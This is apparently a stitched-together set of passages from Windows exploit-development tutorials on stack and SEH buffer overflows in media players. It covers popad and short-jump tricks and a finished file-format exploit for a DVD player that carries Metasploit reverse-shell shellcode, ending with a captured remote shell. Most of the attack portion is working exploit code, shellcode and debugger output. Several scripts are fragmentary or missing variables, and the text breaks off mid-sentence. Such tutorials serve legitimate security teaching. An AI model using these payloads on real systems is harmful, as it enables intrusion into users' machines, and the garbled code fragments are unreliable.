"\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45" .
"\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b" .
"\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43" .
"\x51\x42\x4c\x45\x33\x45\x50\x41\x41";
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
• popad
The “popad” instruction may help us ‘jump’ to our shellcode as well. popad (pop all double)
will pop double words from the stack (ESP) into the general-purpose registers, in one action.
The registers are loaded in the following order : EDI, ESI, EBP, EBX, EDX, ECX and EAX. The
dword that sits between EBP and EBX (the saved ESP value) is skipped rather than loaded, and
the ESP register is incremented after each of these 8 steps.
One popad will thus take 32 bytes from ESP and pop them into the registers in an orderly
fashion.
So suppose you need to jump 40 bytes, and you only have a couple of bytes to make the jump:
you can issue 2 popads to point ESP to the shellcode (which starts with NOPs to make up for
the 24 bytes of overshoot: 2 times 32 bytes – 40 bytes of space that we need to jump over)
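The arithmetic behind this is simple enough to sketch in Python. The helper below is illustrative only; it just rounds the distance up to a multiple of 32 and reports how many bytes of NOP padding are needed to absorb the overshoot.

```python
POPAD_BYTES = 32  # one popad moves ESP by 8 dwords


def popads_needed(distance):
    """Return (number of popads, bytes of overshoot) for a jump of `distance` bytes."""
    count = -(-distance // POPAD_BYTES)  # ceiling division
    overshoot = count * POPAD_BYTES - distance
    return count, overshoot


small_jump = popads_needed(40)
large_jump = popads_needed(260)
```

For 40 bytes this gives 2 popads with 24 bytes of overshoot. For a 260 byte gap it gives 9 popads with 28 bytes of overshoot.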
Let’s use the Easy RM to MP3 vulnerability again to demonstrate this technique :
We’ll reuse one of the script examples from earlier in this post, and we’ll build a fake buffer that
will put 13 X’s at ESP, then we’ll pretend there is some garbage (D’s and A’s), followed by the place to
put our shellcode (NOPs + A’s)
my $file= "test1.m3u";
my $buffersize = 26094;
my $shellcode = "\xcc";
my $eip = "BBBB";
my $preshellcode = "X" x 17; #let's pretend this is the only space we have available
my $garbage = "\x44" x 100; #let’s pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
Let’s pretend that we need to use the 13 X’s (so 13 bytes) that are available directly at ESP to
jump over 100 D’s (0x44) and 160 A’s (so a total of 260 bytes) to end up at our shellcode (which starts
with NOPs, then a breakpoint, and then A’s).
Jumping 260 bytes takes 9 popads (9 x 32 bytes = 288 bytes), which overshoots by 28 bytes,
so we need to start our shellcode with NOPs, or start the shellcode at [start of shellcode]+28
bytes.
In our case, we have put some NOPs before the shellcode, so let’s try to “popad” into the NOPs
and see if the application breaks at our breakpoint.
First, overwrite EIP again with jmp esp (see one of the previous exploit scripts).
Then, instead of the X’s, perform 9 popads, followed by the “jmp esp” opcode (0xff,0xe4)
my $file= "test1.m3u";
my $buffersize = 26094;
my $shellcode = "\xcc";
$preshellcode=$preshellcode."\x61" x 9; #9 popads
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
After opening the file, the application does indeed break at the breakpoint. EIP and ESP look
like this :
000ff874 cc int 3
0:000> d eip
0:000> d eip-32
0:000> d esp
=> the popad’s have worked and made esp point at the nops. Then the jump to esp was made
(0xff 0xe4), which made EIP jump to the NOPs and slide to the breakpoint (at 000ff874)
Replace the A’s with real shellcode :
pwned again !
Another (less preferred, but still possible) way to jump to shellcode is by using jumpcode that
simply jumps to the address (or an offset of a register). Since the addresses/registers could
vary during every program execution, this technique may not work every time.
So, in order to hardcode addresses or offsets of a register, you simply need to find the opcode
that will do the jump, and then use that opcode in the smaller “first”/stage1 buffer, in order to
jump to the real shellcode.
You should know by now how to find the opcode for assembler instructions, so I’ll stick to 2
examples :
1. jump to 0x12345678
0:000> a
jmp 12345678
7c901213
0:000> u 7c90120e
ntdll!DbgBreakPoint:
2. jump to ebx+124h
0:000> a
add ebx,124
jmp ebx
7c90121c
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
=> opcodes are 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx 124h) and 0xff,0xe3 (jmp ebx)
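One detail worth keeping in mind for example 1: the e9 form of jmp stores a displacement relative to the end of the instruction, so the bytes depend on where the jump itself is placed. The Python sketch below recomputes the encoding for the addresses used in the assembler session above; the function name is made up for illustration.

```python
import struct


def jmp_rel32(location, target):
    """Encode 'jmp target' (opcode e9) for an instruction placed at `location`."""
    displacement = (target - (location + 5)) & 0xFFFFFFFF  # relative to the next instruction
    return b"\xe9" + struct.pack("<I", displacement)


encoded = jmp_rel32(0x7C90120E, 0x12345678)
moved = jmp_rel32(0x000FF730, 0x12345678)
```

Assembled at 7c90120e this gives e9 65 44 a4 95. The same jump placed at another address gets different bytes, which is one more reason hardcoded jumps are fragile. Also note that the add ebx,124h encoding in example 2 contains null bytes.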
In the event you need to jump over just a few bytes, you can use a couple of ‘short jump’
techniques to accomplish this :
– a conditional (short/near) jump (“jump if condition is met”) : This technique is based on the
states of one or more of the status flags in the EFLAGS register (CF, OF, PF, SF and ZF). If the
flags are in the specified state (condition), then a jump can be made to the target instruction
specified by the destination operand. This target instruction is specified with a relative offset
(relative to the current value of EIP).
Example : suppose you want to jump 6 bytes : Have a look at the flags (OllyDbg), and depending
on the flag status, you can use one of the opcodes below.
Let’s say the Zero flag is 1, then you can use opcode 0x74, followed by the number of bytes
you want to jump (0x06 in our case)
Opcode        Instruction       Description
74 cb         JE/JZ rel8        Jump short if equal / zero (ZF=1)
77 cb         JNBE rel8         Jump short if not below or equal (CF=0 and ZF=0)
7F cb         JNLE rel8         Jump short if not less or equal (ZF=0 and SF=OF)
E3 cb         JECXZ rel8        Jump short if ECX register is 0
0F 87 cw/cd   JNBE rel16/32     Jump near if not below or equal (CF=0 and ZF=0)
0F 8F cw/cd   JNLE rel16/32     Jump near if not less or equal (ZF=0 and SF=OF)
As you can see in the table, you can also do a short jump based on register ECX being
zero. One of the Windows SEH protections (see part 3 of the tutorial series) that has been
put in place is that registers are cleared when an exception occurs. So sometimes you
will even be able to use 0xe3 as jump opcode (if ECX = 00000000)
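Picking the 2-byte encoding for such a jump can be sketched as a small lookup in Python. The table below only lists a handful of short-jump opcodes from the Intel instruction set reference, and the function name is made up for illustration.

```python
import struct

# Short (rel8) conditional jump opcodes; a small subset only.
SHORT_JUMP_OPCODES = {
    "jz": 0x74,     # jump if ZF=1 (same as je)
    "jnz": 0x75,    # jump if ZF=0 (same as jne)
    "ja": 0x77,     # jump if CF=0 and ZF=0 (same as jnbe)
    "jg": 0x7F,     # jump if ZF=0 and SF=OF (same as jnle)
    "jecxz": 0xE3,  # jump if ECX is 0
}


def short_conditional_jump(mnemonic, displacement):
    """Return opcode plus signed 8-bit displacement for a short conditional jump."""
    opcode = SHORT_JUMP_OPCODES[mnemonic.lower()]
    return bytes([opcode]) + struct.pack("<b", displacement)


zero_flag_jump = short_conditional_jump("jz", 6)
ecx_zero_jump = short_conditional_jump("jecxz", 6)
```

The displacement is packed as a signed byte, so struct.pack raises an error for anything outside -128 to 127, which is exactly the range a short jump can cover.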
Note : You can find more/other information about making 2 byte jumps (forward and
backward/negative jumps) at http://thestarman.narod.ru/asm/2bytejumps.htm
Backward jumps
In the event you need to perform backward jumps (jump with a negative offset) : take the
negative number and convert it to hex (two’s complement). Use that value as the argument to
a jump: \xeb takes a single signed byte (-128 to +127), \xe9 takes a dword.
Example : jump back 400 bytes : -400 = FFFFFE70, so jump -400 bytes =
"\xe9\x70\xfe\xff\xff". As you can see, this opcode is 5 bytes long. Sometimes, if you need to
stay within a dword size (4 byte limit), you may need to perform multiple shorter jumps in
order to get where you want to be.
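The conversion to hex can be left to Python’s struct module, which handles the two’s complement for us. This is a minimal sketch with a made-up helper name; the displacement is taken as-is, the same way the example above treats -400.

```python
import struct


def encode_jump(displacement):
    """Use the 2-byte short jump (eb) when the offset fits in a signed byte, else e9."""
    if -128 <= displacement <= 127:
        return b"\xeb" + struct.pack("<b", displacement)
    return b"\xe9" + struct.pack("<i", displacement)


back_400 = encode_jump(-400)
forward_6 = encode_jump(6)
back_128 = encode_jump(-128)
```

A jump of -400 needs the 5-byte e9 form, while anything down to -128 still fits in the 2-byte eb form. Chaining several short backward jumps is the way to stay within a 4 byte limit.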
Like I said in "Part 1", I think it's important to keep things as difficult or simple as they need to
be, so I won't be explaining SEH in full technical detail, but I’ll give you enough info to get going.
I highly advise you to do some more in-depth research online. SEH is a mechanism in
Windows that makes use of a data structure called a "Linked List", which contains a sequence of
data records. When an exception is triggered, the operating system will travel down this list. Each
exception handler can either decide that it is suitable to handle the exception, or it can tell the
operating system to continue down the list and evaluate the other exception handlers. To be
able to do this, each record in the list needs to contain two elements: (1) a pointer to the
exception handler of the current “Exception Registration Record” (SEH) and (2) a pointer to the “Next Exception
Registration Record” (nSEH). Since our Windows stack grows downward, we will see that the
order of these records is reversed [nSEH]...[SEH]. When an exception occurs in a program
function, the exception handler will push the elements of its structure onto the stack, since this is
part of the function prologue to execute the exception. At the time the handler is called, a pointer
to our record (which starts at nSEH) will be located at esp+8.
You’re probably asking yourself what all of this has to do with exploit development. If we
get a program to store an overly long buffer AND we overwrite a “Structured Exception
Handler”, Windows will zero out the CPU registers, so we won't be able to jump directly to our
shellcode. Luckily this protection mechanism is flawed. Generally what we will want to do is
overwrite SEH with a pointer to a “POP POP RETN” sequence (each POP instruction will remove
4 bytes from the top of the stack, and the RETN instruction will return execution to the address on top of
the stack). Remember that at esp+8 we find the pointer to our record (starting at nSEH), so if we
increment the stack pointer by 8 bytes and return to the new pointer at the top of the stack, we will then be executing nSEH. We
then have at least 4 bytes of room at nSEH to write some opcode that will jump to an area of
memory that we control, where we can place our shellcode!!
This all sounds terribly complicated, but you'll see it's all in the wording; actually creating an
SEH exploit is exceedingly easy, and the example below will demonstrate this.
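To make the POP POP RETN step a bit more concrete, here is a toy model of the stack in Python. All addresses are invented for illustration. It assumes the usual layout at the moment the handler is called: the return address at esp, a pointer to the exception record at esp+4, and a pointer to our registration record (which starts at nSEH) at esp+8.

```python
def pop_pop_ret(stack):
    """Simulate POP, POP, RETN on a list of dwords where stack[0] is the dword at ESP."""
    remaining = list(stack)
    remaining.pop(0)          # first POP discards the dword at esp
    remaining.pop(0)          # second POP discards the dword that was at esp+4
    return remaining.pop(0)   # RETN loads EIP from the dword that was at esp+8


# Hypothetical values, for illustration only.
NSEH_ADDRESS = 0x0012F5B8
stack_at_handler = [
    0x7C9032A8,    # return address into the exception dispatcher
    0x0012F2C0,    # pointer to the exception record
    NSEH_ADDRESS,  # pointer to our registration record (starts at nSEH)
    0x0012F2DC,    # further handler arguments
]

new_eip = pop_pop_ret(stack_at_handler)
```

After the sequence, EIP holds the address of nSEH, so the 4 bytes we wrote there are executed as code.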
Ok so below you can see our POC skeleton exploit; this is a fileformat exploit. We will be
writing a long buffer to a playlist file (*.plf) which will then be read by the DVD player and
cause a buffer overflow (this is really not that different from sending a buffer over a TCP or
UDP connection). The only salient point here is that the “victim” needs to be tricked into
opening our playlist hehe.
#!/usr/bin/python -w
filename="evil.plf"
buffer = "A"*2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Ok so we create the *.plf, attach the player to immunity debugger and open the playlist file.
The player crashes as expected, we pass the initial exception with “Shift-F9” (we do this
because this initial exception leads to a different exploitation technique and we are interested
in the SEH). You can see a screenshot of the CPU registers below (you will notice that the SEH
has zeroed out several registers) and a screenshot of the SEH-chain which shows us that we do
overwrite the SEH record.
Registers
SEH-Chain
The next step should be no surprise, we need to analyze the crash so we replace our initial
buffer with the metasploit pattern (paying attention to keep the same buffer length).
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
[...snip...]
f5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0
Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj
0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8
Cl9Cm0Cm1Cm2Cm3Cm4Cm5
Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
After we recreate our *.plf file and crash the program we can have mona analyze the crash.
You can see the screenshot of that analysis below. What we are particularly interested in are
the bytes that overwrite the SEH-record, mona indicates that these bytes are the 4-bytes that
directly follow after the first 612-bytes of our buffer.
!mona findmsp
Metasploit Pattern
Ok so far so good, based on this information we can reconstruct our buffer as shown below.
We will be allocating 4-bytes for nSEH which should be placed directly before SEH which also
takes up 4-bytes.
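The layout described here can be sketched with placeholder values before any real pointer is filled in. In the Python sketch below the total length of 2000 comes from the first POC, the 608/612 offsets come from the mona output, and the "BBBB" and "CCCC" markers are just stand-ins chosen for illustration.

```python
NSEH_OFFSET = 608    # nSEH sits directly in front of SEH (offset 612)
TOTAL_LENGTH = 2000  # same overall buffer length as the first POC


def build_layout(nseh=b"BBBB", seh=b"CCCC"):
    """Return the buffer skeleton: padding, 4 bytes nSEH, 4 bytes SEH, filler."""
    if len(nseh) != 4 or len(seh) != 4:
        raise ValueError("nSEH and SEH are 4 bytes each")
    padding = b"A" * NSEH_OFFSET
    filler = b"D" * (TOTAL_LENGTH - len(padding) - len(nseh) - len(seh))
    return padding + nseh + seh + filler


layout = build_layout()
```

Keeping the total length fixed while the pieces change is what makes it easy to swap values later without shifting the offsets.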
Remember we need to overwrite SEH with a pointer to POP POP RETN; once again mona
comes to the rescue! The command shown below will search for all valid pointers. It is worth
mentioning that mona already filters out pointers that might be problematic, like
pointers from SafeSEH modules. I suggest you have a look at the documentation to get a
better grasp of the available options to filter the results. You can see the results in the
screenshot.
!mona seh
PPR Pointer
Most of these pointers will do, just keep in mind that they can't contain any bad characters.
Personally I didn't select any of the ones that are visible in the log screen, simply because I
wanted a clean return instead of a return+offset. Since mona found 2968 valid pointers there
are many to choose from; just check out “seh.txt” in the Immunity Debugger installation folder.
Keep in mind that we need to reverse the byte order due to the Little Endian architecture of
the CPU. Observe the syntax below.
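The byte reversal does not have to be done by hand. As a small sketch, Python’s struct module packs a 32-bit value in little-endian order; the pointer value 0x61617619 used here is simply read back from the byte string that appears in the POC, so treat it as inferred rather than quoted from mona.

```python
import struct


def le32(pointer):
    """Pack a 32-bit pointer in little-endian byte order."""
    return struct.pack("<I", pointer)


seh_bytes = le32(0x61617619)
round_trip = int.from_bytes(seh_bytes, "little")
```

The packed result is the byte sequence 19 76 61 61, which is the order the bytes need to have inside the buffer.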
For the moment we will leave nSEH the way it is; in a moment we will have a look in the
debugger to see what value we should fill in there. Notice that our POP POP RETN sequence is
taken from “EPG.dll”, which belongs to the DVD player; that means that our exploit will be
portable across different operating systems!! Our new POC should look like this...
#!/usr/bin/python -w
filename="evil.plf"
#---------------------------------------------------------------------------#
# #
#---------------------------------------------------------------------------#
buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Ok let's recreate our new *.plf file and put a breakpoint on our SEH pointer in the debugger.
After passing the first exception with Shift-F9 we hit our breakpoint. You can see the
screenshot below.
Breakpoint
Perfect!! If we step through these three instructions with F7, the RETN instruction will bring us
back to our “B”*4 (nSEH). We can see that the pointer we put in SEH has been converted to
opcode, and after that we have our “D”*1384, which can be used for our shellcode. All that
remains is to write some opcode in nSEH which will make a short jump forward into our “D”'s;
we can do this live in the debugger, observe the screenshots below.
nSEH
Assemble jmp
jmp opcode
Ok so that’s a pretty neat trick, since we now know which opcode we need to put in nSEH to
jump to our buffer. We need to jump forward at least 6 bytes (the 2 remaining bytes of nSEH
plus the 4 bytes of SEH). Our new buffer should look like this:
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + "D"*1384
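Where the short jump lands can be double-checked with a little offset arithmetic. The Python sketch below works purely with offsets inside the buffer; the constant and function names are made up for illustration.

```python
NSEH_OFFSET = 608                # the 2-byte jump sits at the start of nSEH
SEH_OFFSET = NSEH_OFFSET + 4     # 612
PAYLOAD_OFFSET = SEH_OFFSET + 4  # 616, first byte after SEH


def short_jump_landing(instruction_offset, rel8):
    """A short jump is 2 bytes long and its offset counts from the next instruction."""
    return instruction_offset + 2 + rel8


landing = short_jump_landing(NSEH_OFFSET, 0x06)
minimum_rel8 = PAYLOAD_OFFSET - (NSEH_OFFSET + 2)
```

With an offset of 6 the jump skips the two padding NOPs and the 4 bytes of SEH, and lands on the first byte after the SEH pointer.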
The serious work is done. We need to (1) make room for our shellcode and (2) generate a
payload to insert in our exploit. Again like in the previous part we want to have our buffer
space calculated dynamically so we can easily exchange the shellcode if we want to. You can
see the result below. Any shellcode that we insert in the shellcode variable will get executed
by our buffer overflow.
#!/usr/bin/python -w
filename="evil.plf"
shellcode = (
#----------------------------------------------------------------------------------#
# #
#----------------------------------------------------------------------------------#
# \----------------> #
# \--------------------------------------> #
# <-------/ #
# (2) nSEH jumps over SEH and redirects execution to our B's #
# (3) We place our shellcode here ... Game Over! #
#----------------------------------------------------------------------------------#
textfile.write(buffer)
textfile.close()
Ok time to generate some shellcode. For the sake of diversity I'll be using a reverse shell...
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows
Speech API
[...snip...]
Module: payload/windows/shell_reverse_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
'\x00\x0A\x0D\x1A' -t c
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54";
#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html #
#----------------------------------------------------------------------------------#
# #
# G:\tutorial>ipconfig #
# ipconfig #
# #
# Windows IP Configuration #
# #
# #
# #
# IP Address. . . . . . . . . . . . : 192.168.111.128 #
# Default Gateway . . . . . . . . . : #
# #
# G:\tutorial> #
#----------------------------------------------------------------------------------#
filename="evil.plf"
#---------------------------------------------------------------------------------------------------------------#
#---------------------------------------------------------------------------------------------------------------#
shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
#----------------------------------------------------------------------------------#
# #
#----------------------------------------------------------------------------------#
# \----------------> #
# <-------/ #
# (2) nSEH jumps over SEH and redirects execution to our B's #
#----------------------------------------------------------------------------------#
textfile.write(buffer)
textfile.close()
In the screenshot below we can see the before and after output of the “netstat -an” command,
and below that the BackTrack terminal output of our reverse shell connection. Game
Over!!
Shell
root@bt:~/Desktop# nc -lvp 9988
192.168.111.128: inverse host lookup failed: Unknown server error : Connection timed out
G:\tutorial>ipconfig
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
Default Gateway . . . . . . . . . :
G:\tutorial>
https://www.fuzzysecurity.com/tutorials/expDev/3.html
I have indicated that SEH needs to be overwritten by a pointer to “pop pop ret” and that next
SEH needs to be overwritten with jump code that jumps 6 bytes forward, over SEH… Of course, this
structure was based on the logic of most SEH based vulnerabilities, and more specifically on the
vulnerability in Easy RM to MP3 Player. So it’s just an example behind the concept of SEH based
vulnerabilities. You really need to look at all registers, work with breakpoints, etc, to see where
your payload / shellcode resides… look at your stack and then build the payload structure
accordingly… Just be creative.
Sometimes you get lucky and the payload can be built almost blindfolded. Sometimes you
don’t get lucky, but you can still turn a somewhat hard to exploit vulnerability into a stable
exploit that works across various versions of the operating system. And sometimes you will
need to hardcode addresses because that is the only way to make things work. Either way,
most exploits don’t look the same. They are manual and handcrafted work, based on the
specific properties of a given vulnerability and the available methods to exploit the
vulnerability.
In today’s tutorial, we’ll look at building an exploit for a vulnerability that was discovered in
Millenium MP3 Studio 1.0, as reported at http://www.milw0rm.com/exploits/9277.
The proof of concept script states that (probably based on the values of the registers), it’s easy
to exploit… but it did not seem to work for the person who discovered the flaw and posted this
PoC script.
Based on the values in the registers displayed by “Hack4love”, one could conclude that this is a
typical stack based overflow, where EIP gets overwritten with the junk buffer… so you need to
find the offset to EIP, find the payload in one of the registers, overwrite EIP with a “jump to…”
and that’s it ? Well… not exactly.
Let’s see. Create a file with “http://”+5000 A’s… What do you get when you run the application
via windbg and open the file ? We’ll create an mpf file :
my $sploitfile="c0d3r.mpf";
my $junk = "http://";
$junk=$junk."A"x5000;
my $payload=$junk;
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);
Open windbg and open the mp3studio executable. Run the application and open the file. (I’m
not going to repeat these instructions every time, I assume you know the drill by now)
00400000*** ERROR: Module load completed but symbols could not be loaded for image
Right, access violation… but the registers are nowhere near the ones mentioned in the PoC
script. So either the buffer length is wrong (to trigger a typical stack based EIP overwrite
overflow), or it’s a SEH based issue. Look at the SEH Chain to find out :
0:000> !exchain
0012f9a0: +41414140 (41414141)
Ah, ok. Both the SE Handler and the next SEH are overwritten. So it’s a SEH based exploit.
Build another file with a 5000 character Metasploit pattern in order to find the offset to next
SEH and SE Handler :
0:000> !exchain
0012f9a0: +30684638 (30684639)
So SE Handler was overwritten with 0x39466830 (little endian, remember), and next SEH was
overwritten with 0x67384667.
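If you don’t have pattern_offset at hand, the lookup can be sketched in a few lines of Python. This is only a minimal sketch: the function names are made up for illustration, and it assumes the 5000 character pattern follows the usual Metasploit layout (upper case letter, lower case letter, digit). The two values are taken in memory byte order, as quoted above.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def cyclic_pattern(length):
    """Build a Metasploit-style pattern: Aa0Aa1Aa2...Aa9Ab0Ab1..."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length].encode("ascii")

def offset_of(raw_bytes, length=5000):
    """Offset of a 4-byte sequence (in memory order) inside the pattern, or -1."""
    return cyclic_pattern(length).find(raw_bytes)

# !exchain displays the handler as the dword 30684639; in memory (little endian)
# that is the byte sequence 39 46 68 30, i.e. the ASCII text "9Fh0".
se_handler = struct.pack("<I", 0x30684639)
next_seh = bytes.fromhex("67384667")      # memory order, as quoted in the text

print(se_handler, offset_of(se_handler))  # b'9Fh0' 4109
print(next_seh, offset_of(next_seh))      # b'g8Fg' 4105
```

Next SEH lands at offset 4105 inside the pattern and SE Handler 4 bytes later, which agrees with the 4105 junk characters (counted after the 7 character prefix) used in the layout that follows.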
Now, in a typical SEH exploit, you would build your payload like this :
• first 4105 junk characters (and get rid of some nasty characters such as the 2
slashes after http: + added a couple of A’s to keep the amount of characters in
groups of 4)
• then 4 bytes that overwrite next SEH
• then 4 bytes that overwrite the SE Handler
• then the shellcode
or, in perl (still using some fake content just to verify the offsets) :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="BBBB";
my $seh="CCCC";
my $shellcode="D"x($totalsize-length($junk.$nseh.$seh));
my $payload=$junk.$nseh.$seh.$shellcode;
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);
Crash :
00400000*** ERROR: Module load completed but symbols could not be loaded for
image00400000image
!exchain
0012fb8c: +43434342 (43434343)
So SE Handler was overwritten with 43434343 (4 C’s, as expected), and next SEH was
